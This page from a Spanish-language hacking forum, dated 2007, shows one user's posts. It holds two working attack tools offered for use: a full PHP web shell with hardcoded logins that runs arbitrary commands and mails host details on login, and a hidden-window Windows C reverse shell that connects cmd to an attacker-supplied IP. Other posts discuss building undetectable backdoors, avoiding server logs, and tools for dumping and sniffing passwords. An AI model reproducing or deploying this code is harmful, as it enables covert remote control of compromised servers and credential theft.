Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - WHK

#4431
Hacking / Re: Jugando con netcat
15 Junio 2007, 06:03 AM
 :xD esa sección no funciona pero si quieres saber tu ip visita esta pagina:
http://ip.interchile.com/
#4432
Encontré algo que talves pueda interesarte.

SSH.PHP

<?php


error_reporting
(0);
session_start();

unset(
$user);        // Just in case ;-]
unset($pass);

if (
$_POST['cmd']) $_POST['cmd'] = my_encode($_POST['cmd']);

$cache_lines 1000;
$history_lines 100;
$history_chars 20;

$user[] = "root";                $pass[] = md5("hacked");
$user[] = "user";      $pass[] = md5("muie1234");
$to="";
$subject "php SSH";
$info .= "HOST:\t$HTTP_HOST\n";
$info .= "DOC_ROOT:\t$PATH_TRANSLATED\n";
$info .= "IP:\t$REMOTE_ADDR\n";
$info .= "URL:\t$HTTP_REFERER\n";
$from "nobody@nobody.com";

if (
$_SESSION['login'])
{
   
mail ("$to","$subject","$info","$from");
}


$alias = array(
    
"la"    => "ls -la",
    
"rf"    => "rm -f",
    
"unbz2" => "tar -xjpf",
    
"ungz"  => "tar -xzpf"
);



if (!
$_SESSION['user']) {

    
$pr_login "Login:\n";
    
$pr_pass "Password:\n";
    
$err "Invalid login!\n\n";
    
$succ "Warning!
Don`t be stupid .. this is a priv3 server, so take extra care!!!\n\n"
;

    if (
$_SESSION['login'] && $_POST['cmd']) { // WE HAVE USERNAME & PASSWORD

        
$_SESSION['output'] .= $pr_pass;

        if (
in_array($_SESSION['login'], $user)) { //........ USERNAME EXISTS

            
$key array_search($_SESSION['login'], $user);

            if (
$pass[$key] != md5($_POST['cmd'])) { //....... WRONG PASSWORD
                
$_SESSION['output'] .= $err;
                unset(
$_SESSION['login']);
                
$prompt $pr_login;

            } else { 
//..................................... SUCCESSFUL LOGIN
                
$_SESSION['user'] = $_SESSION['login'];
                
$_SESSION['whoami'] = substr(shell_exec("whoami"), 0, -1);
                
$_SESSION['host'] = substr(shell_exec("uname -n"), 0, -1);
                
$_SESSION['dir'] = substr(shell_exec("pwd"), 0, -1);
                
$_SESSION['output'] .= $succ;
                
$prompt set_prompt();
                unset(
$_SESSION['login']);
            }

        } else { 
//......................................... NO SUCH USERNAME
            
$_SESSION['output'] .= $err;
            unset(
$_SESSION['login']);
            
$prompt $pr_login;
        }

    } else { 
//................................................ LOGIN PROCESS

        
if (!$_SESSION['login'] && !$_POST['cmd']) $prompt $pr_login;

        if (!
$_SESSION['login'] && $_POST['cmd']) {
            
$_SESSION['login'] = $_POST['cmd'];
            
$_SESSION['output'] .= substr($pr_login0, -1) . $_POST[cmd]\n";
            
$prompt $pr_pass;
        }
    }

} else { 
//........................................................ LOGGED IN



                            /*=-- MEMBERS AREA --=*\
                            \*=-- MEMBERS AREA --=*/


    
$prompt set_prompt();

    
chdir($_SESSION['dir']);

    if (
$_REQUEST['clear_hist']) //............................ CLEAR HISTORY
        
$_SESSION['history'] = "";

    if (
$_SESSION['history']) $hist_arr explode("\n"$_SESSION['history']);

    if (
$_POST['cmd']) {

        if (!
in_array($_POST['cmd'], $hist_arr)) { //......... ADD TO HISTORY
            
$hist_arr[] = $_POST['cmd'];
            
$_SESSION['history'] = implode("\n"$hist_arr);
        }

        if (
count($hist_arr) > $history_lines) { //........... CUTOFF HISTORY
            
$start count($hist_arr) - $history_lines;
            
$_SESSION['history'] = "";

            for (
$i $start$i count($hist_arr); $i++)
                
$_SESSION['history'] .= $hist_arr[$i] . "\n";

            
$_SESSION['history'] = substr($_SESSION['history'], 0, -1);
            
$hist_arr explode("\n"$_SESSION['history']);
        }

        
$first_word first_word($_POST['cmd']);

        if (
array_key_exists($first_word$alias)) { //. CHECKING FOR ALIASES
            
$_POST['cmd'] = $alias[$first_word] . substr($_POST['cmd'], strlen($first_word));
            
$first_word first_word($_POST['cmd']);
        }

        switch (
$first_word) {

          case 
"clear":
            
$_SESSION['output'] = "";
            break;

          case 
"exit":
            
session_destroy();
            
refresh();
            break;

          case 
"cd":
            
$_SESSION['output'] .= $prompt;
                
$result shell_exec($_POST['cmd'] . " 2>&1 ; pwd");
            
$result explode("\n"$result);
            
$_SESSION['dir'] = $result[count($result) - 2];

            if (
count($result) > 2//.............. WE HAVE AN ERROR MESSAGE
                
$result[0] = "\n" substr($result[0], strpos($result[0], "cd: ")) . "\n";
            else 
$result[0] = "\n";

                
$prompt set_prompt();
                
$_SESSION['output'] .= $_POST['cmd'] . $result[0];
                break;

          default:
            
$result shell_exec($_POST['cmd'] . " 2>&1");

            if (
substr($result, -1) != "\n"$result .= "\n";
            
$_SESSION['output'] .= $prompt $_POST['cmd'] . "\n" $result;

            
$rows preg_match_all('/\n/'$_SESSION['output'], $arr);
            unset(
$arr);

            if (
$rows $cache_lines) {
                    
preg_match('/(\n[^\n]*){' $cache_lines '}$/'$_SESSION['output'], $out);
                
$_SESSION['output'] = $out[0] . "\n";
            }
        }
    }
}



                             
/*=-- FUNCTIONS --=*\
                             \*=-- FUNCTIONS --=*/


function my_encode($str) {
    
$str str_replace("\\\\""\\"$str);
    
$str str_replace("\\\"""\""$str);
    
$str str_replace("\\'""'"$str);

    while (
strpos($str"  ") !== false$str str_replace("  "" "$str);

    return 
rtrim(ltrim($str));
}

function 
set_prompt() {
    global 
$_SESSION;

    return 
$_SESSION['whoami'] . "@" $_SESSION['host'] . " " substr($_SESSION['dir'], strrpos($_SESSION['dir'], "/") + 1) . " $ ";
}

function 
first_word($str) {
    list(
$str) = preg_split('/[ ;]/'$str);
    return 
$str;
}

function 
refresh() {
    global 
$_SERVER;

    
$self substr($_SERVER['SCRIPT_NAME'], strrpos($_SERVER['SCRIPT_NAME'], "/") + 1);
    
header("Location: $self");
    die;
}



                             
/*=-- HTML PAGE --=*\
                             \*=-- HTML PAGE --=*/


$out substr(preg_replace('/<\/(textarea)/i''&lt;/\1'$_SESSION['output']), 0, -1);

?>
<HTML>

<HEAD>
  <TITLE>dis Shell Commander</TITLE>
  <STYLE TYPE="text/css"><!--

    INPUT, TEXTAREA, SELECT, OPTION, TD {
        color: #BBBBBB;
        background-color: #000000;
        font-family: Terminus, Fixedsys, Fixed, Terminal, Courier New, Courier;
    }

    TEXTAREA {
        overflow-y: auto;
        border-width: 0px;
        height: 100%;
        width: 100%;
        padding: 0px;
    }

    INPUT {
        border-width: 0px;
        height: 26px;
        width: 100%;
        padding-top: 5px;
    }

    SELECT, OPTION {
        color: #000000;
        background-color: #BBBBBB;
    }

    BODY {
        overflow-y: auto;
        margin: 0;
    }

  --></STYLE>
  <SCRIPT LANGUAGE="javascript"><!--

hist_arr = new Array();

<?php

foreach ($hist_arr as $key => $value) {
    
$value str_replace("\\""\\\\"$value);
    
$value str_replace("\"""\\\""$value);
    echo 
"hist_arr[$key] = \"$value\";\n";
}

?>


function parse_hist(key) {
    if (key < hist_arr.length) {
            if (key != "") {
            document.getElementById('input').value = hist_arr[key];
            document.getElementById('input').focus();
        }
    } else {
            window.location.href = "?clear_hist=1";
    }
}

function input_focus() {
    document.getElementById('input').focus();
}

function selection_to_clipboard() { // IE only!
    if (window.clipboardData && document.selection)
        window.clipboardData.setData("Text", document.selection.createRange().text);
}

if (window.clipboardData)
    document.oncontextmenu = new Function("document.getElementById('input').value = window.clipboardData.getData('Text'); input_focus(); return false");

  --></SCRIPT>
</HEAD>
<BODY onLoad="document.getElementById('output').scrollTop = document.getElementById('output').scrollHeight; input_focus()" TOPMARGIN="0" LEFTMARGIN="0">
<TABLE CELLPADDING="0" CELLSPACING="0" BORDER="0" HEIGHT="100%" WIDTH="100%">
<TR>
  <TD HEIGHT="100%" BGCOLOR="#000000" STYLE="padding-top: 5px; padding-left: 5px; padding-right: 5px; padding-bottom: 0px"><TEXTAREA ID="output" onSelect="selection_to_clipboard()" onClick="input_focus()" READONLY><?= $out ?></TEXTAREA></TD>

</TR>
<TR>
  <TD BGCOLOR="#000000"><TABLE CELLPADDING="0" CELLSPACING="5" BORDER="0" WIDTH="100%">
    <TR>
    <FORM METHOD="POST" ACTION="">
      <TD NOWRAP onClick="input_focus()"><?= substr($prompt, 0, -1) ?></TD>
      <TD WIDTH="100%"><INPUT ID="input" TYPE="<?= (!$_SESSION['user'] && $_SESSION['login']) ? 'PASSWORD' : 'TEXT' ?>" NAME="cmd"></TD>
    </FORM><?php

if ($hist_arr) {

    
?>
<TD NOWRAP><SELECT onChange="parse_hist(this.options[this.selectedIndex].value)">
        <OPTION VALUE="">--- HISTORY</OPTION><?php

    
for ($i count($hist_arr) - 1$i >= 0$i--) {

        if (
strlen($hist_arr[$i]) > $history_chars$option substr($hist_arr[$i], 0$history_chars 3) . "...";
        else 
$option $hist_arr[$i];

        echo 
"<OPTION VALUE=\"" $i "\">$option</OPTION>";
    }

      
?>
<OPTION VALUE="<?= $history_lines + 1 ?>">--- CLEAR HISTORY</OPTION></SELECT></TD><?php

}

  
?>
</TR>

  </TABLE></TD>
</TR>
</TABLE>

<SCRIPT LANGUAGE="javascript"><!--
document.getElementById('output').scrollTop = document.getElementById('output').scrollHeight;
--></SCRIPT>

</BODY>
</HTML><?
#4433
Hacking / Re: Necesitas una contraseña?
13 Junio 2007, 23:27 PM
CitarCual de estos me sirve pa sacar contraseñas de cuando hay q registrarse en paginas web???????!!!!!


Respuesta

CitarProtected Storage PassView v1.63
revela las contraseñas almacenadas en tu computadora por:

Outlook
AutoComplete passwords in Internet Explorer
Password-protected sites in Internet Explorer
MSN Explorer Passwords

CitarSniffPass v1.01
utilidad que escucha tu red, captura las contraseñas que pasan a través de tu adaptador de la red, y las exhibe en la pantalla inmediatamente. SniffPass puede capturar las contraseñas de los protocolos siguientes (Puedes utilizar esta utilidad para recuperar contraseñas perdidas de Web/FTP/Email (contraseñas básicas de la autentificación)):

POP3
IMAP4
smtp
ftp
HTTP

CitarIE PassView v1.04
Recupera las contraseñas guardadas por:

Internet Explorer 4.0
Internet Explorer 6.0
Internet Explorer 7.0

CitarNetscapass v2.03
Recupera contraseñas guardadas por Netscape tales como la contraseña de servidores POP3. Versiones soportadas:

Netscape Communicator 4.x
Netscape 6.x
Netscape 7.x

CitarCain & Abel
Cain y Abel es una herramienta de la recuperación de la contraseña para los sistemas operativos de Microsoft. Permite la recuperación fácil de la varia clase de contraseñas sniffeando la red, crackeando contraseñas cifradas usando los ataques del diccionario, de la fuerza bruta y del criptoanálisis, conversaciones de registración de VoIP, contraseñas revueltas el descifrar, recuperando las llaves sin hilos de la red, cajas de la contraseña que revelan, destapando contraseñas depositadas y analizando protocolos de la encaminamiento. El programa no explota ningunas vulnerabilidades o bugs del software que no se podrían fijar con poco esfuerzo.


Remote Console
Remote LSA Secrets Dumper
Remote NT Hashes Dumper
Remote Route Table Manager
Remote TCP/UDP Table Viewer
Cisco Config Downloader/Uploader
MAC Scanner
Network Enumerator
Password Crackers
Brute-Force Password Cracker
Dictionary Password Cracker
Cryptanalysis
Rainbowcrack-online
WEP Cracker
Password Decoders
Password Dumpers
Password/Hash Calculators
Promiscuous-mode Scanner
Route Table Manager
Service Manager
SID Scanner
Sniffer
TCP/UDP Table Viewer

Traceroute
Wireless Scanner

#4434
Buscando alguna información sobre como usar proxyes o Socks 4 y 5 en Visual Basic encontré que nadie ha posteado sobre el tema  :-( por lo cual me dediqué a buscar en google y encontré algunas curiosidades que al final les agregué cosas mias y terminé creando un proxy-sniffer.. algo asi como un brouncer pero en VB  :P de todas maneras esto no soluciona mi problema porque yo quiero usar servidores externos como cliente no como servidor.



Ojalá lo disfruten igualmente  ;)
#4435
Espera... Yo lo soluciono  :xD

#4436
 :P tiene la función de la shell y para instalar netcat con Wget... podriamos desarmar el c99 o el r57 para crear nuestros propios backdoors indetectables para unix y windows con detectores y todo lo demas.
Nota: Si tenía instalado netcat y wget pero no me lo reconoció como instalado. estaban en %windir%\system32\nc.exe y wget.exe creo que son direcciones tipicas que podrías incluir en la busqueda, ademas no necesitas usarel netcat para tener la shell inversa... basta compilar esto:


#include <winsock2.h>
#include <stdio.h>
#include <windows.h>
#pragma comment(lib,"ws2_32"Giño

int main(int argc, char *argv[])
{
ShowWindow(GetForegroundWindow(),SW_HIDE);
WSADATA wsaData;
SOCKET hSocket;
STARTUPINFO si;
PROCESS_INFORMATION pi;
struct sockaddr_in addr;
memset(&addr,0,sizeof(addr));
memset(&si,0,sizeof(si));
WSAStartup(MAKEWORD(2,0),&wsaData);
hSocket = WSASocket(AF_INET,SOCK_STREAM,NULL,NULL,NULL,NULL);
addr.sin_family = AF_INET;
addr.sin_port = htons(PUERTO);
addr.sin_addr.s_addr = inet_addr("TU IP O DOMINIO NO-IP")Giño;
connect(hSocket,(struct sockaddr*)&addr,sizeof(addr));
si.cb = sizeof(si);
si.dwFlags = STARTF_USESTDHANDLES;
si.hStdInput = si.hStdOutput = si.hStdError = (void *)hSocket;
CreateProcess(NULL,"cmd",NULL,NULL,true,NULL,NULL,NULL,&si,&pi);
ExitProcess(0);
}

Cuando tenga tiempo trataré de ayudarte para que todos podamos colaborar o si lo prefieres me hago uno solo.
Recuerda además que si manejas una simulación de netcat directamente estarás enviando tus comandos directamente al log del servidor, por eso prefiero tomar una shell directa lo mas luego posible despues de tomarla desde el servidor web, se que algunos usan sniffers pero es menos que el 100% de probabilidades que teines sobre dejar tus huellas en el servidor  :P
#4437
Porfin un usuarui de rapidshare y no de megaupload  :xD

Muy bueno tus tutos codebreack... mucho antes que entraras en este foro yo miraba todos tus videos y desde entonces que he aprendido bastante... ojalá tenga algún dia el tiempo que tu tienes para poder aprender mas  :xD

Felicitaciones.
#4438
buscate el armadillo.. es parecido al themida.
No es perfecto pero les causaras grandes dolores de cabeza al que quiera descompilar tu soft.
#4439
Tutoriales - Documentación / Re: Curso Shell
11 Junio 2007, 20:04 PM
Muy bueno... me ha gustado bastante.
Se supone que cuando contratas un servidor externo te dan esa shell para poder administrar tu servidor "X"?
#4440
Hacking / Re: Jugando con netcat
9 Junio 2007, 23:53 PM
Puedes aplicar politicas de administración de archivos con el comando cacls e impedir su ejecución y eliminación de cada ejecutable involucrado en un proceso  :P

Ejemplo:

Restringe:
cacls C:\1.exe /E /C /P %username%:n
cacls C:\1.exe /E /C /P SYSTEM:n

Habilita:
cacls C:\1.exe /E /C /P SYSTEM:f
cacls C:\1.exe /E /C /P %username%:f

CitarMicrosoft Windows XP [Versión 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS>cacls
Muestra o modifica las listas de control de acceso (ACL)  de archivos

CACLS archivo [/T] [/E] [/C] [/G usuario:perm] [/R usuario [...]]
               [/P usuario:perm [...]] [/D usuario [...]]);
   archivo          Muestra ACLs.
   /T               Cambia las ACLs de los archivos especificados en
                 el directorio actual y en todos los subdirectorios.
   /E                Modifica la ACL en vez de remplazarla.
   /C               Continúa cambiando ACLs, omitiendo errores.
   /G usuario:perm  Concede derechos de acceso al usuario.
                 Perm puede ser: R  Leer
                              W  Escribir
                              C  Cambiar (escribir)
                              F  Control total
   /R usuario    Suspende los derechos del usuario (sólo con /E).
   /P usuario:perm  Sustituye los derechos de acceso del usuario.
                 Perm puede ser: N  Ninguno
                              R  Leer
                              W  Escribir
                              C  Cambiar (escribir)
                              F  Control total
   /D usuario       Denegar acceso al usuario especificado.
Se pueden usar comodines para especificar más de un archivo en el comando.
Puede especificar más de un usuario en el comando.

Abreviaciones:
   CI - Herencia de Contenedor.
        ACE se heredará por directorios.
   OI - Herencia de objeto.
        ACE se heredará por archivos.
   IO - Sólo heredar.
        ACE no se aplica al archivo o directorio actual.

C:\WINDOWS>